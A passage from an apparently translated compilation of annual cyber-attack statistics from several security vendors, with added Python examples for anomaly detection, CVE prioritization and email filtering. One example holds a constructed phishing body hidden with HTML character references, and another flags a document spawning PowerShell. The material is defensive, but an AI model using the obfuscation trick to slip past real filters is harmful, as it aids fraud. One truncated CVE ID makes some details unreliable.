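    return {"user": user, "host": host, "parent": parent, "proc": proc, "dport": dport}

# Constructed training data: ordinary office activity over a few weeks.
TRAINING: List[Event] = (
    [_ev("alice", "ws-01", "explorer.exe", "winword.exe")] * 40
    + [_ev("alice", "ws-01", "explorer.exe", "outlook.exe", 443)] * 40
    + [_ev("bob", "ws-02", "explorer.exe", "chrome.exe", 443)] * 60
    + [_ev("svc_backup", "srv-01", "services.exe", "backup.exe", 445)] * 20
)

# Constructed new events: one benign, two resembling post-exploitation,
# one with a single new relation that stays below the threshold.
NEW: List[Event] = [
    _ev("alice", "ws-01", "explorer.exe", "winword.exe"),
    _ev("alice", "ws-01", "winword.exe", "powershell.exe", 1389),  # document spawns a shell
    _ev("bob", "srv-01", "services.exe", "cmd.exe"),               # bob on a server, odd chain
    _ev("alice", "ws-02", "explorer.exe", "outlook.exe", 443),     # only the host is new
]

if __name__ == "__main__":
    base = Baseline().learn(TRAINING)
    for event, reasons in detect(base, NEW):
        print(event["user"], event["host"], event["proc"], "->", "; ".join(reasons))
```

In production the baseline would be rebuilt on a rolling window and keyed per host group, but the structure is the same: the relations are cheap to store as sets and counters, and an attacker who has never run on the network cannot avoid creating relations that are absent from them.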

The number of cyber attacks for the year increased by 6.5% - Positive Technologies

On April 19, 2022, Positive Technologies announced that the number of cyber attacks in 2021 increased by 6.5% compared to 2020. The share of targeted attacks grew by 4 percentage points to 74% of the total. As in 2020, 86% of all attacks were directed at organizations. The three most frequently attacked industries were government agencies (16%), medical institutions (11%) and industrial companies (10%). The most common attack methods were the use of malware (63%), social engineering (50%) and hacking, that is, exploitation of security flaws and vulnerabilities in software (32%).


Positive Technologies experts analyzed the current cyber threats of 2021, noting the dominance of ransomware among malware, an increase in the intensity of attacks on crypto exchanges, the emergence of critically dangerous vulnerabilities that were immediately exploited by attackers in many organizations around the world. These trends, as stated in the study, will be relevant for 2022.

Among the malware used in attacks on companies, ransomware was the most common: according to Positive Technologies, it was involved in 60% of cases, an increase of 15 percentage points over 2020. In 2021, attackers began to threaten to publish data stolen from companies if the victim turned to the police for help or hired a negotiator. This tactic has already been used by the Grief and Ragnar Locker groups.

Cybercriminals again paid special attention to cryptocurrency. According to Positive Technologies estimates, the number of attacks on crypto exchanges increased by 44% compared to 2020. In 2021, one of the largest cryptocurrency thefts in history took place: attackers stole about $600 million from the Poly Network platform. Mostly, cybercriminals exploited vulnerabilities in interaction protocols. Another method gaining momentum is the exploitation of web vulnerabilities on the sites of crypto platforms.

The use of Linux grows every year, especially in the wake of import substitution, and attackers could not ignore this. Starting from the second quarter of 2021, Positive Technologies researchers noted that more and more malware developers were tailoring their malware to attacks on Linux systems. If there are such systems in the infrastructure, experts recommend regular scans for malicious activity, checking files in a sandbox before they are run on the system, and installing security updates in a timely manner.

In 88% of attacks on individuals, cybercriminals used social engineering. Phishing topics in 2021 included the COVID-19 pandemic, premieres of films and TV series, investments and corporate mailings. Investments received particular attention from cybercriminals in 2021; Positive Technologies analysts link this to the influx of non-professional investors (over the past year, more than 6 million people joined the Moscow Exchange). Already at the very beginning of 2022, Russian citizens faced phishing attacks in which attackers promised to help preserve savings if Russia were disconnected from the SWIFT international transfer system, or offered to make money on arbitrage trading.

Throughout the year, Positive Technologies experts recorded the emergence of high-profile vulnerabilities that attackers weaponized immediately, with hundreds and thousands of organizations around the world falling victim. Examples include ProxyLogon in MS Exchange, PrintNightmare in the Windows print spooler and CVE-2021-40444 in the MSHTML component of Internet Explorer. In December 2021, the term "cyber pandemic" even appeared because of the abundance of attacks using the CVE-2021-44228 vulnerability in the Log4j library. In 2021, hacking and exploitation of web vulnerabilities together accounted for 43% of all methods used in attacks on organizations, 8 percentage points more than in the previous year.

Against the background of a difficult geopolitical situation, we predict an increase in the number of attacks, so we recommend that companies move from typical information security processes to the principles of effective security. We strongly encourage companies to focus on protecting key and target assets and the points of penetration into the internal network. You should also pay attention to how the vulnerability management process is organized in the company. The main problem faced by information security staff is prioritizing vulnerabilities for remediation. At the end of 2021, we published our recommendations for solving this problem,

comments Yana Yurakova, analyst of the Positive Technologies research group.
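The prioritization problem named in the quote above, and the use of NVD data as a guide mentioned in the CROC section earlier, can be shown in a few dozen lines. The following is an added example and is neither Positive Technologies' recommendation nor code from the page. It reads records in the shape of the NVD API 2.0 JSON, joins them with a hypothetical asset inventory and ranks each finding by CVSS base score plus bumps for exploitation in the wild (NVD's cisaExploitAdd field, set for CVEs on the CISA KEV list), network reachability on an exposed host, and asset criticality. The record values, host names and weights are constructed assumptions, not NVD's actual data.

```python
"""Rank CVEs for remediation by joining NVD-style records with an asset inventory.

Added illustrative example; not Positive Technologies' code and not from this
page. The record shape follows the NVD API 2.0 JSON (vulnerabilities[].cve
with metrics.cvssMetricV31[].cvssData and the cisaExploitAdd field NVD sets
for CVEs on the CISA Known Exploited Vulnerabilities list). The records,
their metric values and the asset inventory below are constructed for the
example and are not NVD's actual data; the weights are an assumption.
"""
import json
from dataclasses import dataclass
from typing import Dict, List

@dataclass
class Asset:
    name: str
    cves: List[str]            # CVE IDs a scanner found on the asset
    internet_facing: bool
    business_critical: bool

def load_records(nvd_json: str) -> Dict[str, dict]:
    """Index the 'cve' objects of an NVD API 2.0 response by CVE ID."""
    return {v["cve"]["id"]: v["cve"] for v in json.loads(nvd_json)["vulnerabilities"]}

def _cvss(cve: dict) -> dict:
    """Primary CVSS v3.1 data block, or {} if NVD has not scored the CVE yet."""
    metrics = cve.get("metrics", {}).get("cvssMetricV31", [])
    primary = [m for m in metrics if m.get("type") == "Primary"] or metrics
    return primary[0].get("cvssData", {}) if primary else {}

def priority(cve: dict, asset: Asset) -> float:
    """Higher means fix sooner. Starts from the CVSS base score and raises it
    for what matters more than the base score alone: exploitation in the
    wild, a network-reachable flaw on an exposed host, and asset criticality."""
    data = _cvss(cve)
    score = float(data.get("baseScore", 5.0))   # unscored CVE: assume medium
    if "cisaExploitAdd" in cve:                  # listed in CISA KEV
        score += 4.0
    if data.get("attackVector") == "NETWORK" and asset.internet_facing:
        score += 2.0
    if asset.business_critical:
        score += 1.0
    return round(score, 1)

def rank(nvd_json: str, assets: List[Asset]) -> List[Dict]:
    """Rows of (asset, cve, priority) sorted from most to least urgent."""
    records = load_records(nvd_json)
    rows = []
    for asset in assets:
        for cve_id in asset.cves:
            cve = records.get(cve_id)
            if cve is None:
                continue                         # not in the local NVD mirror yet
            rows.append({"asset": asset.name, "cve": cve_id,
                         "priority": priority(cve, asset)})
    return sorted(rows, key=lambda r: (-r["priority"], r["asset"]))

def _rec(cve_id, score, vector, kev_date=None) -> dict:
    cve = {"id": cve_id, "metrics": {"cvssMetricV31": [
        {"type": "Primary", "cvssData": {"baseScore": score, "attackVector": vector}}]}}
    if kev_date:
        cve["cisaExploitAdd"] = kev_date
    return {"cve": cve}

# Constructed NVD-style response: the IDs are ones mentioned on this page, but
# the scores, vectors and KEV dates are chosen for the example, not copied from NVD.
SAMPLE_NVD = json.dumps({"vulnerabilities": [
    _rec("CVE-2021-44228", 10.0, "NETWORK", "2021-12-10"),
    _rec("CVE-2021-40444", 8.8, "NETWORK"),
    _rec("CVE-2019-11510", 10.0, "NETWORK", "2021-11-03"),
]})

# Constructed asset inventory (hypothetical host names).
SAMPLE_ASSETS = [
    Asset("web-proxy-01", ["CVE-2021-44228"], internet_facing=True, business_critical=True),
    Asset("hr-workstation-07", ["CVE-2021-40444"], internet_facing=False, business_critical=False),
    Asset("vpn-gw-02", ["CVE-2019-11510"], internet_facing=True, business_critical=False),
    Asset("build-server", ["CVE-2021-44228"], internet_facing=False, business_critical=False),
]

if __name__ == "__main__":
    for row in rank(SAMPLE_NVD, SAMPLE_ASSETS):
        print(f"{row['priority']:5.1f}  {row['asset']:18s} {row['cve']}")
```

The ordering that comes out is the one a practitioner would expect and a plain CVSS sort would not give: the same CVE-2021-44228 lands above or well below CVE-2019-11510 depending on whether the host carrying it is exposed and critical, and an unexploited high-scoring flaw on an internal workstation drops to the bottom.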

Cyber attacks rise 22% - Tet

Tet (formerly Lattelecom) on February 21, 2022 announced what cyber attacks and risks businesses and users had to face in 2021.

The set of most common threats has not changed: in 2021, the Tet team recorded 50 million spam messages, 123,500 blocked malicious emails and 3,066 denial-of-service (DDoS) attacks stopped, 22% more than a year earlier. Half of the attempted DDoS attacks lasted from 1 to 5 minutes, and 1% lasted at least an hour, which indicates targeted and sophisticated attacks. The most powerful DDoS attack blocked by Tet reached 112 Gbps. At the same time, the number of malicious emails identified by Tet in 2021 was 12% lower than a year earlier, which may be due to lower activity of the Emotet malware.

As predicted, in 2021 the number of cyber attacks increased significantly. There is a steady increase in the number of DDoS attacks, which are becoming more aggressive and larger in scale. Their targets are not only individuals but, in most cases, companies in manufacturing and e-commerce and their supply chains. Thus, at the end of 2021, the largest DDoS attack on Russian retailers was recorded. Whole countries also suffered from DDoS attacks in 2021. For example, in January 2022 a DDoS attack that lasted four days left Andorra without Internet for many hours. And Microsoft announced that in November 2021 its services repelled a DDoS attack whose peak traffic reached 3.47 terabits per second; the attack targeted an e-commerce company in Asia and lasted 15 minutes, said Artur Filatov, head of cybersecurity services at Tet.

One of the key cybersecurity trends of 2021 worth watching in 2022 is zero-day attacks, which are the hardest to identify.

One of these attacks exploited the Log4j vulnerability. Using it, an attacker can remotely run arbitrary code on the target computer, which lets him steal data, install malware or take control of the device. The Log4j vulnerability caused serious problems around the world in December 2021, not sparing even Apple and Microsoft. Unfortunately, 100% effective protection against this type of attack does not exist, but every company can mitigate the consequences and complicate the attackers' life by monitoring and correctly configuring its systems, explained A. Filatov.

According to Symantec global data, small businesses are most at risk of receiving malicious emails: in organizations with 1 to 250 employees, one in 323 incoming emails is malicious, while with a staff of 1,001 to 1,500 it is one in 823. This suggests that even a small business should take care of its security, and that the mindset "we are small, so cybercriminals are not interested in us" can lead to data loss and a halt in the company's operations, a Tet spokesman said.

The best defense is a cyber attack that never happened, so we urge businesses to take care of security in advance. This means having not only a plan for a cyber crisis but also a strategy to ensure business continuity. Developing such plans makes it possible to identify likely weaknesses, improve performance and designate the departments responsible in a crisis, so that employees do not panic and know what to do. But the most important and effective prevention of cyber incidents is constant training of employees in cyber hygiene!

The number of cyber attacks on corporate networks increased by 50%

On January 12, 2022, the Check Point Research (CPR) team at Check Point Software Technologies shared statistics reflecting the growth of cyber attacks in 2021 by region, country and industry.

In 2021, CPR recorded a 50% increase in weekly cyber attacks on corporate networks compared to 2020. The researchers noted that attacks peaked in December (925 attacks per organization per week), presumably due to exploitation of the Log4j vulnerability.

Hackers were most interested in organizations in Africa, the Asia-Pacific region and Latin America. The highest growth in cyber attacks compared to 2020 was seen in Europe. Among the most attacked industries in the world, the education and research sector ranked first.


Priority sectors for hackers in 2021

  1. Organizations from the fields of education and research (an increase in attacks by 75%);
  2. Organizations from the state and defense sphere (an increase in attacks by 47%);
  3. Communications organizations (51% increase in attacks);
  4. IT service providers (67% increase in attacks);
  5. Healthcare organizations (71% increase in attacks).

Priority regions

  1. Africa (+ 13%);
  2. Asia Pacific (+ 25%);
  3. Latin America (+ 38%);
  4. Europe (+ 68%);
  5. North America (+ 61%).
Hackers continue to adopt innovative approaches and solutions, said Omer Dembinsky, threat data manager at Check Point Software Technologies. In 2021, we saw a staggering 50% increase in weekly cyber attacks on corporate networks compared to 2020. We noted a peak of attacks at the end of the year, mainly due to attempts to exploit the Log4j vulnerability. New penetration techniques and methods of evading detection have made it much easier for hackers to carry out their plans. Most worryingly, some key social sectors are on the most-attacked list.

According to Dembinsky, government organizations and companies in education and health care were among the five most attacked industries in the world, and those numbers are expected to grow in 2022. Attackers will continue to adopt new tools and methods for cyber attacks, especially ransomware. It can be said that we are in a cyber pandemic.

Safety recommendations

  1. Focus on preventing threats, not just detecting them;
  2. Protect every possible perimeter;
  3. Install updates as soon as they become available;
  4. Segment the network;
  5. Train employees;
  6. Deploy advanced security technologies.

40% increase in cyber attacks - Check Point

On October 6, 2021, Check Point Software Technologies announced the results of an analysis of current cyber threats around the world. The analysis showed that the number of cyber attacks in 2021 increased by 40% compared to 2020. In Russia, the number of attacks increased by 54% year-on-year.

After a slight dip in the first weeks of 2020, the number of attacks in the world has grown significantly since March 2020, peaking in September 2021, when the number of attacks per organization worldwide exceeded 870 per week, twice the figure for March 2020.

Cyber attacks by region

  1. Africa: an average of 1,615 attacks per organization per week, a 15% increase from 2020
  2. Asia-Pacific: an average of 1,299 attacks per organization per week, 20% higher year-on-year
  3. Latin America: 1,117 attacks, 37% more than in 2020
  4. Europe: an average of 665 attacks per week, up 65% from 2020
  5. North America: an average of 497 attacks per week, up 57%


Europe and North America experienced the sharpest increase in the number of cyber attacks compared to 2020 - an increase of 65% and 57%, respectively.

The Asia-Pacific region sees the largest number of ransomware attack attempts: in 2021, one in 34 organizations there was hit every week.

Figure 1. Average number of cyber attacks per week per organization (January 2020 to September 2021)

While Africa remains the most attacked region, Europe and North America saw the fastest rise in cyber attacks between early 2020 and September 2021. Organizations in Africa are attacked most often, 1,615 attacks a week, 15% more than last year. They are followed by the Asia-Pacific region with 1,299 attacks per organization per week on average (an increase of 20%), then Latin America with 1,117 attacks (an increase of 37%), Europe with 665 attempted attacks (an increase of 65%) and North America with 497 attacks (an increase of 57% year-on-year).

The sectors that are subjected to the largest number of cyber attacks were education and research activities - an average of 1,468 attacks per week (an increase of 60% compared to 2020), followed by government, military organizations - from 1,082 (an increase of 40%) and health care - with 752 attempted attacks (an increase of 55%).

In addition, Check Point Research noted that in 2021 one in 61 organizations on average was hit by ransomware every week, 9% more than in 2020. The sector most popular with attackers is ISP/MSP (Internet and IT service providers), where one in 36 organizations faces ransomware attacks, 32% more than in 2020. Health care is in second place, with one in 44 organizations regularly attacked by ransomware (an increase of 39%), and software vendors are in third place with one in 52 organizations (an increase of 21%).

The largest number of ransomware attacks is observed in the Asia-Pacific region: here one of 34 organizations faces them every week. This is 10% less compared to 2020. This is followed by Africa, where every 48th organization is attacked (a decrease of 7%) and Latin America - every 57th organization (an increase of 6% year-on-year).

As for the types of malware that are most often used for attacks, botnets came first: on average, more than 8% of organizations are exposed to them in the world (this is 9% less than in 2020). This is followed by banking Trojans - 4.6% of companies (an increase of 26%) and cryptominers - 4.2% (a decrease of 22% year-on-year).

The data used in this report were collected and analyzed in Check Point ThreatCloud. ThreatCloud is a large collaborative network for fighting cybercrime that provides threat and attack trend data from a global network of threat sensors. The ThreatCloud database inspects more than 3 billion websites and 600 million files every day and detects more than 250 million malware activities daily.

2020

Industrial incidents up 91% - Positive Technologies

On April 28, 2021, Positive Technologies announced that its experts analyzed the cyber threats of 2020 and found that compared to 2019, the number of incidents at industrial enterprises increased by 91%, and the number of attacks using malware increased by 54%. In first place in the number of attacks using ransomware were medical institutions. Read more here.

The number of identified cyber threats increased by 20% and exceeded 62.6 billion - Trend Micro

On February 26, 2021, Trend Micro announced that in 2020, the company's products identified 119,000 cyber threats every minute. The target of the attacks was primarily employees working from home and the network infrastructure. Trend Micro published this and other facts in the annual review report A Constant State of Flux: Trend Micro 2020 Annual Cybersecurity Report ("Constant variability: Trend Micro report on the state of cybersecurity for the 2020 year").

The report, among other things, says that one of the most popular targets among cybercriminals in 2020 was home networks. With their help, attackers sought to gain access to corporate network resources or use home IoT devices for their botnets. According to Trend Micro estimates, the number of attacks on home networks increased by 210% and reached almost 2.9 billion, affecting about 15.5% of routers. 73% of these attacks used the brute force method to gain control of a router or smart home appliance.

Among the 62.6 billion threats blocked in 2020 by Trend Micro solutions, in 91% of cases, email was the vector of the attack . This means that phishing remains an extremely popular tool among cybercriminals. The company identified 14 million unique links leading to phishing pages on the Web. With their help, the attackers sought to obtain information from employees who had lost their vigilance during their work from home.

In 2020, companies faced an unprecedented number of cyber threats across their vast infrastructure, including employees' home networks. The main hacking tools are still the familiar tactics: phishing, brute force and exploitation of vulnerabilities, which should help in the development of security tools. Organizations around the world have had time to assess the operational and cybersecurity risks associated with the pandemic. 2021 gives them a chance to adapt to the threats and apply comprehensive cloud security systems that will help protect distributed infrastructure,

noted Jon Clay, Director of Global Threat Awareness at Trend Micro

The report also tells about other notable trends:

  • The number of ransomware families used in "double extortion" attacks grew by 34%: criminals first steal data and then encrypt it, demanding a ransom both for decryption and for not publishing the stolen data. Targeted attacks on government organizations, banks, industrial and health care facilities are also gaining popularity.
  • The number of vulnerabilities published by the Zero Day Initiative (ZDI) in 2020 increased by 40% compared to 2019. At the same time, Trend Micro notes that cybercriminals continue to actively use vulnerabilities known since 2005.
  • A large number of attacks exploited vulnerabilities in the VPN services used by remote employees. CVE-2019-11510, a critical arbitrary file read vulnerability in Pulse Connect Secure, featured in 800,000 cyber attack detections by Trend Micro.
  • Incorrect configuration of cloud services also led to negative consequences in 2020. According to Trend Micro, unprotected APIs have been used by cybercriminals in several cryptocurrency mining attacks.
  • The ZDI initiative has released information about 1,453 vulnerabilities, almost 80% of which are critical or high-risk.
  • And a little about positive trends: the number of detected BEC attacks (attacks related to the compromise of business mail) in 2020 decreased by 17%, but the company does not have data on the success rate of these attacks.

In 2020, the Russian Federation suffered relatively little from ransomware attacks: their number was only 9.6% of the pan-European figure and 0.58% of the global one. Nevertheless, in the number of threats identified in email messages, Russia was second in Europe and fifth in the world (1.245 billion). The number of botnet servers and of links to malicious sites hosted in the Russian Federation was also high (3.4 thousand and almost 6.5 million, respectively), as was the number of visits by Russian users to such sites worldwide (more than 14.5 million). In the total number of malware detections, Russia was 43rd in the world with 1.4 million.

There were practically no BEC or PoS attacks in the country in 2020, but in the number of attacks on mobile devices Russia ranked 11th in the world: more than 5 million applications were flagged as suspicious by Trend Micro solutions, of which 21.5 thousand were malicious. Attacks on users' home networks also proved extremely popular in the Russian Federation. The number of events identified by Trend Micro tools in this area exceeded 358 million, putting Russia in first place with 12.5% of the global total.

2019

Rostelecom-Solar: the volume of cyber incidents increased by 30%

On March 30, 2020, Rostelecom-Solar reported that in 2019 the volume of cyber incidents increased by 30%, while the share of external incidents increased from 54% to 58%. In total, in 2019, the Solar JSOC Cyber ​ ​ Threat Monitoring and Response Center identified and repelled over 1.1 million attacks targeting the infrastructure of more than 100 large government and commercial organizations from various sectors of the economy.

In 2019, Solar JSOC analysts for the first time noted a sharp increase (by 40%) in attacks aimed at gaining control over IT infrastructure, against the background of a 15% decrease in the number of attacks aimed at stealing money. In previous years the picture was the opposite: attacks to steal money grew by tens of percent annually, while cybercriminals' interest in infrastructure as such was less pronounced. Experts attribute the current situation to the fact that the average level of security of banks, which most often served as the target of cybercriminals, has increased significantly. This forces hackers to look for more vulnerable targets: automated process control systems (APCS) of enterprises and closed network segments are becoming more and more attractive to them.

"A long and discreet presence in the organization's infrastructure allows attackers to investigate its internal processes in detail and gain deeper access to and control over IT systems. Later, hackers monetize these points of presence by selling them on the black market, blackmailing the victim organization or engaging in competitive intelligence. In addition, in recent years, attacks have increasingly been aimed at industrial and energy facilities, as well as state authorities, control over whose infrastructure is critical for the country as a whole,"
said Vladimir Dryukov, Director of the Solar JSOC Cyber Attack Monitoring and Response Center at Rostelecom-Solar.

Against the background of an increase in the volume of external attacks, Solar JSOC experts note a positive trend: organizations began to pay more attention to protecting their information infrastructure. Partly thanks to this, for the first time in 5 years, the share of critical incidents decreased (from 19% to 16%).

"The pace of closing vulnerabilities in Russia is significantly higher than in other countries: Russian servers make up less than 5% of vulnerable servers in the world. For example, in 2019, the number of Russian servers on the perimeter exposed to the EternalBlue vulnerability decreased by more than five times, from 260 thousand to 49.7 thousand. However, approximately 40% of the servers that are still vulnerable are owned by large commercial or state-owned companies,"
emphasized Vladimir Dryukov.

As before, the most popular methods of hacking corporate infrastructures remain infection with malware (viruses, trojans, spyware, etc.) and exploitation of vulnerabilities in web applications (web portals, email, personal accounts, etc.). The frequency of their use increased by 11% and 13%, respectively. Whereas in 2018 the main function of malware was encrypting data, in 2019 it was cryptocurrency mining.

DDoS attacks demonstrate significant technological progress. In 2019, attackers were 40% more likely to use IoT botnets, networks of infected "smart" devices, for DDoS. As a rule, such devices are weakly protected and easily hacked. With the growing number of IoT devices in the world, DDoS attacks will become cheaper and more accessible, and companies may soon face another surge in this threat, Solar JSOC experts warn.

The number of attacks on mobile banking in the first half of the year increased 2 times - Check Point

On August 1, 2019, Check Point Software Technologies released the Cyber Attack Trends: 2019 Mid-Year Report. Hackers continue to develop new toolkits and methods that target corporate data stored in cloud infrastructure, personal mobile devices, various applications and even popular email platforms. No sector is fully protected from cyber attacks, the researchers note.

Cyber attack categories by region according to Check Point Software Technologies

Check Point experts have identified key trends in cyber threats in the first half of 2019:

  • Mobile banking: The number of attacks has doubled compared to 2018. Banking malware is a very common mobile threat. It can steal payment data and credentials, as well as funds from victims' bank accounts. New versions of banking malware are available for mass distribution to anyone willing to pay for them.
  • Supply chain attack: Cybercriminals can expand their reach by attacking a company's supply chain. In this type of cyber attack, hackers inject malicious code directly into software used by the victim company. Once this malicious code executes, criminals can access the company's private information.
  • Email: Attackers use various methods to bypass security solutions and spam filters. For example, they send emails with complex encoding, as well as complex underlying code that mixes plain-text letters with HTML characters. In addition, attackers use social engineering methods and modify and personalize the contents of emails.
  • Cloud storage: The growing popularity of public clouds has led to an increase in cyberattacks targeting the vast volumes of confidential data on these platforms. The biggest threats to cloud security in 2019 are misconfiguration and poor management of cloud resources.
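The entity-mixing evasion described in the Email bullet is easiest to see from the defender's side. The following added example (not code from Check Point or from the original article) shows that a filter matching keywords against the raw message body misses an obfuscated message, while the same filter run after HTML normalization catches it; the message bodies and keyword list are constructed for this example.

```python
"""Added example: why a content filter must normalize an email body
before keyword matching. Attackers mix ordinary letters with HTML
character references and tags so that naive filters do not match.
The sample bodies and keywords below are constructed, not real."""
import html
import re

# Constructed sample bodies. The second hides "payment" and "invoice"
# behind numeric/hex HTML character references and an inline tag.
PLAIN_BODY = "<p>Urgent: wire the payment for invoice 4471 today.</p>"
OBFUSCATED_BODY = (
    "<p>Urgent: wire the p&#97;y<span>m</span>&#101;nt for "
    "inv&#x6f;&#105;ce 4471 today.</p>"
)

# Keywords a simplistic filter might look for in a payment-fraud message.
KEYWORDS = ("payment", "invoice", "wire")

TAG_RE = re.compile(r"<[^>]+>")


def normalize_body(raw: str) -> str:
    """Decode HTML character references, drop tags, collapse whitespace."""
    text = html.unescape(raw)        # &#97; -> a, &#x6f; -> o, &amp; -> &
    text = TAG_RE.sub("", text)      # remove <span>, <p>, ... entirely
    return re.sub(r"\s+", " ", text).strip().lower()


def naive_matches(raw: str) -> list:
    """Match keywords against the raw body, as a naive filter would."""
    lowered = raw.lower()
    return [k for k in KEYWORDS if k in lowered]


def normalized_matches(raw: str) -> list:
    """Match keywords only after the body has been normalized."""
    text = normalize_body(raw)
    return [k for k in KEYWORDS if k in text]


if __name__ == "__main__":
    for label, body in (("plain", PLAIN_BODY), ("obfuscated", OBFUSCATED_BODY)):
        print(label, "naive:", naive_matches(body),
              "normalized:", normalized_matches(body))
```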

"Neither cloud storage nor our smartphones and email: no environment is immune to cyber attacks. Threats such as personalized ransomware attacks, DNS attacks and cryptominers will continue to be relevant in 2019. Security experts need to keep abreast of the latest threats and attack techniques to ensure the best level of protection for their organizations."

Types of Malware from Check Point Software Technologies

The most active malware in the first half of 2019 according to Check Point Software Technologies:

  1. Emotet (29%) is an advanced, self-propagating modular Trojan. Emotet was once used as a banking Trojan and more recently has been used to deliver other malware or malicious campaigns. It uses several methods to avoid detection. It is distributed through phishing spam messages containing malicious attachments or links.
  2. Dorkbot (18%) is an IRC-based worm designed to let its operator execute code remotely. It can also be used to download additional malware onto an infected system to steal confidential information.
  3. Trickbot (11%) is a variant of Dyre that appeared in October 2016. Since its first appearance, it has targeted banks mainly in Australia and the UK, and more recently it has also started to appear in India, Singapore and Malaysia.


The most active cryptominers in the first half of 2019:

  1. Coinhive (23%) is a cryptominer designed to mine the Monero cryptocurrency without users' knowledge when they visit websites. Coinhive only appeared in September 2017, but as of August 2019 it had already hit 12% of organizations around the world.
  2. Cryptoloot (22%) is a miner embedded in websites using JavaScript code. It mines Monero cryptocurrency without user permission.
  3. XMRig (20%) is open source software first discovered in May 2017. It is used to mine Monero cryptocurrency.


The most active mobile threats of the first half of 2019:

  1. Triada (30%) is a modular backdoor for Android that grants superuser privileges to downloaded malware and also helps inject it into system processes. Triada has also been spotted spoofing URLs loaded in browsers.
  2. Lotoor (11%) is a program that exploits vulnerabilities in the Android operating system to gain privileged root access on compromised mobile devices.
  3. Hidad (7%) is a modular backdoor for Android that grants superuser rights to downloaded malware and also helps inject it into system processes. It can gain access to key security details built into the OS, allowing it to obtain sensitive user data.


In Russia, a mobile malware strain called "Agent Smith" was very active. Under the guise of a hidden app linked to Google, the malware exploits known Android vulnerabilities and automatically replaces installed apps with malicious versions without the user noticing. Users downloaded the app from the popular unofficial 9Apps app store. As of August 2019, Agent Smith had infected about 57 thousand devices in Russia.

Top malware according to Check Point Software Technologies

Top malware for banks in the first half of 2019:

  1. Ramnit (28%) is a banking Trojan that steals bank account credentials, FTP passwords, session cookies and personal data.
  2. Trickbot (21%) is the dominant banking Trojan, constantly replenished with new capabilities, functions and propagation vectors. This makes Trickbot flexible and customizable malware that can be distributed through multi-purpose campaigns.
  3. Ursnif (10%) is a Trojan running on the Windows platform. It is usually distributed through exploit kits, Angler and Rig. It can steal information related to Verifone Point-of-Sale (POS) payment software. To do this, the Trojan contacts a remote server to upload the collected information and receive instructions. It then downloads files to the infected system and executes them.

The first-half 2019 report "Cyber Attack Trends: Annual Report 2019" shows the full landscape of cyber threats. The findings are based on data from the Global Threat Impact Index and ThreatCloud Map, which were developed by ThreatCloud intelligence, an anti-cybercrime network that provides threat and attack trend data from a global network of threat sensors.

2018

Solar recorded an 89% increase in the number of cyber attacks in Russia

On April 24, 2019, Rostelecom-Solar, a national provider of technologies and services for protecting information assets, monitoring and managing information security, presented an analytical report on cyber attacks on Russian companies for 2018.

The average daily flow of information security events processed by SIEM systems and used to provide Solar JSOC services amounted to 72.2 billion. In total, in 2018, Solar JSOC specialists recorded over 765 thousand computer attacks. This is 89% more than a year earlier. The proportion of critical incidents rose to 19%, reaching the highest level since 2015. This trend suggests that attackers' tools continue to improve. The pace of their creation also accelerated sharply in 2018: just 2 days after information about the vulnerability CVE-2018-159 appeared, the Cobalt group was already sending out malware exploiting it.

In the second half of 2018, the number of attacks aimed at gaining control over IT infrastructure increased by 20%. Attackers strive to quietly gain a foothold in the infrastructure in order to investigate it in detail and gain the deepest possible access to information and technological systems.

"We observe that at the start, attackers often use completely non-core tools: for example, cases of banking Trojans being sent to state authorities and energy organizations are often recorded. Later, managed segments of the botnet are resold to other groups, and the attack then develops using specialized tools,"
said Vladimir Dryukov, Director of the Solar JSOC Cyber Attack Monitoring and Response Center at Rostelecom-Solar.

The number of attacks aimed at theft of funds increased by 37% compared to the first half of the year. The development of information exchange within the community continues to allow credit and financial institutions to receive timely information about how an attack is carried out and to prevent attackers' actions. However, even after receiving information about a newly observed type of cyber attack, not all companies take any protective measures. For example, despite the damage from mass attacks in 2017-2018, as of April 2019, 266,294 Russian servers were still exposed to the EternalBlue vulnerability, and 953 network devices were still running with the Cisco Smart Install (SMI) protocol exposed. These organizations remain vulnerable to seemingly outdated attacks like WannaCry or attacks on Cisco hardware.

2018 was also marked by a number of large virus infections of technological networks (APCS segments) isolated from the Internet. Since antivirus software on such networks is updated manually, accidental infection of one node leads to rapid spread of the virus, while the process of eliminating the threat, on the contrary, takes several times longer than in the corporate segment.

According to Solar JSOC, about 70% of complex targeted attacks start with phishing. On average, every 7th user who has not completed awareness training falls for social engineering. However, this figure varies depending on the functional unit of the company. In the legal service, on average, every fourth employee becomes a victim of phishing; in accounting, the financial and economic service and logistics, every fifth; in the secretariat and technical support service, every sixth.

Another threat to the information security of organizations posed by employees is the leakage of confidential data. In 2018, leaks accounted for almost half of all internal information security incidents. In about one in five cases, the actions of employees led to the compromise of accounts in internal corporate IT systems. The perpetrators of internal incidents were usually ordinary employees (about 60% of cases). The share of contractors and outsourcers usually fluctuated around the 10% mark, but in the second half of the year it reached 15.2%. This is probably because the spread of the service model is driving growth of the outsourcing market, while the level of information security in Russian companies remains quite low.

Trend Micro: About 48bn cyber attacks blocked

On February 13, 2019, it became known that Trend Micro Incorporated had presented statistics on cyber threats in the world for 2018, broken down by the most popular types of attacks and the most attacked countries. In 2018, more than 2.5 trillion requests were processed by the company's solutions. As a result, about 48 billion attacks were blocked, including email threats, malicious files and URLs, and 222 "families" of ransomware were identified.

Phishing remains the most popular and numerous cyber threat. In total, 41 billion cases were prevented over the year, while between November and December their number decreased by 200 million. The highest level of cyber attacks was in the United States, where over 10 billion attacks were stopped; in China and Brazil the number of stopped attempts exceeded 2 billion, and in India, 1.5 billion.

The most common malicious attachment format was .XLS, with a total of 22 million spam attacks recorded. The number of blocked URLs referencing malicious applications or hosting sites exceeded 1 billion. Among the countries whose residents most often encountered malicious URLs, Japan (160 million blocked attacks), the United States (155 million) and Taiwan (73 million) are leading.

Cyber attacks through business email compromise (BEC) have increased. In 2017, about 10 thousand cases were recorded, and in 2018 over 12 thousand. Mostly, employees opened letters requesting payment on behalf of suppliers, or letters in which the sender posed as a lawyer or the company's legal counsel responsible for confidential matters. However, the most popular form of fraud was hacking a top management account and sending letters, or "imitating" letters, on behalf of the CEO and CFO in order to transfer funds to accounts controlled by the attackers. Australia (4,230 blocked threats) and the USA (3,694 blocked threats) were most affected by such attacks.

At the end of 2018, the five most active malicious programs are worth highlighting: the CoinMiner cryptocurrency miner (1,350,951 attacks), WannaCry ransomware (616,399 attacks), Powload (378,825 attacks), Downad (240,746 attacks) and Sality (166,981 attacks).

